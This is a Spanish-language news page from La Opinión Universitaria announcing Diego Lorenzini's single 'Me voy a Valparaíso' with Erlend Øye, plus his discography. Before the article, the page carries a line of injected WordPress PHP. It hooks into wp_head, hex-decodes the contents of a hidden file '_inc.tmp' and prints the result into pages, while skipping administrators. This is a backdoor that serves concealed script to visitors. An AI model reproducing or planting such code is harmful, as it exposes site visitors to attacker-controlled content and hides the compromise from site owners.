if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “Me voy a Valparaíso”, lo nuevo de Diego Lorenzini ft. Erlend Øye – La Opinión Universitaria La Opinión Universitaria
Menu

“Me voy a Valparaíso”, lo nuevo de Diego Lorenzini ft. Erlend Øye

 

 

 

 

Ciudad de México.- LA canción «Me Voy A Valparaíso», es el nuevo sencillo que se desprende del próximo disco solista de Diego Lorenzini,  que cuenta con la colaboración del aclamado músico noruego Erlend Øye del ‘indie’ europeo, conocido por su trabajo en los grupos «Kings of Convenience» y «The Whitest Boy Alive”.

Desde Chile, el músico Diego Lorenzini presenta “Me voy a Valparaíso”, un  tercer sencillo cargado de folk alternativo caracterizado por la paleta de calidez y ritmo de Erlend Øye, que llega previo a la revelación de su nuevo disco “De algo hay que morir”, cuyo lanzamiento verá la luz a finales de agosto.

A estas alturas, el músico noruego Erlend ha recorrido gran parte de Chile con sus proyectos musicales, y era de de esperarse que surgiera una colaboración entre él y Lorenzini, luego de que ambos compartieran repetidas veces el escenario en esta zona del Cono Sur;  es así como nace un tema dedicado a la colorida ciudad de Valparaíso.

“Me voy a Valparaíso”, habla sobre la noticia de una nueva oportunidad y las expectativas en otro lugar, que sugiere un poco de optimismo cómico y soñador que idealiza el regreso a su tierra con planes que se deducen en la felicidad determinada por hacer lo que le gusta, compartir las buenas y las malas, y asuntos por resolver a lado de la persona amada.

Esta canción se suma a las ya estrenadas “Sí Po” y “Pony”, recibidas de muy buena manera por los seguidores del cantautor, productor y dibujante chileno, Diego Lorenzini.

Diego Lorenzini, es miembro del grupo de post-punk TUS AMIGOS NUEVOS y de la banda de música no-experimental LOS VARIOSARTISTAS.  Desde 2011, Lorenzini lidera el sello de gestión colectiva UVA ROBOT dedicado a producir y distribuir canciones raras hechas por gente común.

Como solista, ha editado el EP «Tres Retratos Hasta el Minuto» (2011), «Trenzas Ad Honorem» (2013) y “Pino” (2016). Su trabajo como productor musical puede escucharse en los discos «Loza» (2017) de NIÑA TORMENTA, «Arriba es Abajo» (2018) de CHINI AND THE TECHNICIANS y «Lo Primero» (2018) de ROSARIO ALFONSO.

  • No comments

    Deja una respuesta

    Tweets recientes